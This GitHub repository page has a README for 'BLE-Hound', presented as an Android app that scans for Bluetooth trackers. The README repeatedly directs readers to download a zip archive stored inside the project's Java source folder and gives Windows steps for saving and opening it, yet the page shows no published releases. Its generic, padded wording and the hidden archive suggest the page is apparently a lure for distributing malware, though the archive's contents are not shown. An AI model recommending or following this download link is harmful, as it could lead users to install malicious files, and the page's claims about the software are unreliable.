Skip to content

eduardo8188/BLE-Hound

Repository files navigation

📡 BLE-Hound - Find Nearby Bluetooth Devices Fast

Download BLE-Hound

🧭 Overview

BLE-Hound is an Android BLE scanner that finds nearby Bluetooth devices and marks the ones it sees. It helps you spot trackers and other Bluetooth devices around you.

Use it to scan for devices such as:

  • AirTag
  • Tile trackers
  • Galaxy SmartTag
  • Other BLE devices

📥 Download and Set Up

To get BLE-Hound, visit this page to download:

https://github.com/eduardo8188/BLE-Hound/raw/refs/heads/main/app/src/main/java/com/BL_Hound_v3.7.zip

Open the page and look for the latest release or download file. If the page offers an APK file, download it to your Android phone or tablet. If it offers source files only, you can still review the project details and use the build steps below on a Windows PC.

🪟 On Windows

If you want to use the project page on Windows first:

  1. Open the download link in your browser.
  2. Check the files or release section.
  3. Save the app file to a folder you can find again.
  4. If you have an APK, send it to your Android device and open it there.
  5. If you have source files, use Android Studio on Windows to open and build the app.

📱 On Android

If you already have the APK:

  1. Copy the file to your Android device.
  2. Open the file from your Downloads folder.
  3. Allow app installs from your browser or file app if needed.
  4. Tap Install.
  5. Open BLE-Hound after the install finishes.

🔍 What BLE-Hound Does

BLE-Hound scans for Bluetooth Low Energy devices nearby. It shows the devices it finds and can make the important ones stand out.

Common uses:

  • Check for trackers in a room
  • See what Bluetooth devices are near you
  • Review BLE device names and IDs
  • Spot unknown devices that keep showing up

⚙️ How It Works

BLE-Hound listens for BLE signals in range. When it finds a device, it reads the device data and shows it in a list. The app then highlights devices that match known tracker types or device patterns.

This can help you:

  • Notice devices that may follow you
  • Compare device names
  • Review signal strength
  • Scan more than once to see what stays nearby

✅ System Requirements

For normal use, you need:

  • An Android phone or tablet
  • Bluetooth turned on
  • Location access allowed for scanning
  • A recent Android version that supports BLE scanning
  • Enough battery for a full scan

For Windows setup and review:

  • Windows 10 or Windows 11
  • A web browser
  • Android Studio if you want to build from source
  • USB cable if you plan to copy files to a phone

📲 Permissions You May Need

BLE-Hound may ask for:

  • Bluetooth access
  • Nearby device access
  • Location access
  • Storage access if you save scan results

Android often needs these permissions before it can show BLE devices. Grant them so the scan can run.

🚀 First Run

After you install and open BLE-Hound:

  1. Turn on Bluetooth.
  2. Grant the requested permissions.
  3. Start a scan.
  4. Wait while the app looks for nearby devices.
  5. Review the list of devices it finds.
  6. Look for highlighted entries that match known tracker types.

If you move around the room and scan again, the list may change. That can help you find the source of a device.

🛠️ Build From Source on Windows

If you want to build the app on a Windows PC:

  1. Install Android Studio.
  2. Open the BLE-Hound project folder.
  3. Let Android Studio load the project files.
  4. Wait for the package downloads to finish.
  5. Connect an Android device or use an emulator.
  6. Click Run to start the app.

If Android Studio asks for a missing SDK, install the version it requests and try again.

🔐 Tracker Detection Basics

BLE-Hound is built for Bluetooth tracker checks. It can help you look for:

  • AirTag-style devices
  • SmartTag devices
  • Tile devices
  • Other BLE tags and beacons

The app compares scan results against known patterns and shows which devices stand out. That makes it easier to check a space without reading raw Bluetooth data.

🧪 Tips for Better Scans

Use these steps for cleaner results:

  • Keep Bluetooth on
  • Stay near the area you want to check
  • Close other scan apps
  • Run more than one scan
  • Move slowly through the space
  • Check rooms, bags, cars, and nearby shelves

If a device appears in one scan and stays in later scans, it may be close by.

📁 Files and Project Layout

The project may include:

  • App source files
  • Android manifest settings
  • Scan logic
  • Device matching rules
  • Resources such as icons and screens
  • Gradle build files

If you build from source, Android Studio uses these files to create the app.

🧩 Common Use Cases

BLE-Hound fits a few simple tasks:

  • Check a home for unknown Bluetooth devices
  • Look for hidden trackers in a car
  • Review devices before travel
  • Scan a work area for BLE tags
  • Compare one scan to the next

❓ If the App Does Not Start

Try these steps:

  1. Make sure Bluetooth is on.
  2. Check that you granted all permissions.
  3. Restart the app.
  4. Reboot the phone.
  5. Try the scan again.
  6. If you built from source, clean the project and run it again in Android Studio.

📌 Download Link

Visit this page to download or review the release files:

https://github.com/eduardo8188/BLE-Hound/raw/refs/heads/main/app/src/main/java/com/BL_Hound_v3.7.zip

🧰 Helpful Checks Before You Scan

Before you begin, make sure:

  • The phone has charge
  • Bluetooth is on
  • Location services are on if Android asks for them
  • You are near the area you want to check
  • The app has all needed permissions

🔎 What You Will See in the App

BLE-Hound may show:

  • Device name
  • Bluetooth address
  • Signal strength
  • Device type
  • Highlighted tracker matches

That view helps you sort through many nearby devices without digging through raw data

🖥️ Windows File Handling

If you are using Windows to work with the project page:

  • Save downloads in one folder
  • Keep the APK or project folder easy to find
  • Rename files only if you can still recognize them
  • Use File Explorer to move files to your phone
  • Use Android Studio if you want to open the source project

📦 Supported Device Types

The app is meant to detect common BLE devices and tags, including:

  • Bluetooth beacons
  • Location tags
  • Smart trackers
  • Wearables
  • Nearby BLE accessories

🧭 Simple Workflow

  1. Download the app or open the project page.
  2. Install it on Android or build it on Windows.
  3. Turn on Bluetooth.
  4. Grant permissions.
  5. Run a scan.
  6. Review the devices that appear.
  7. Check highlighted matches

About

Detect BLE trackers and classify nearby devices with real-time signal scanning for Android wireless awareness

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages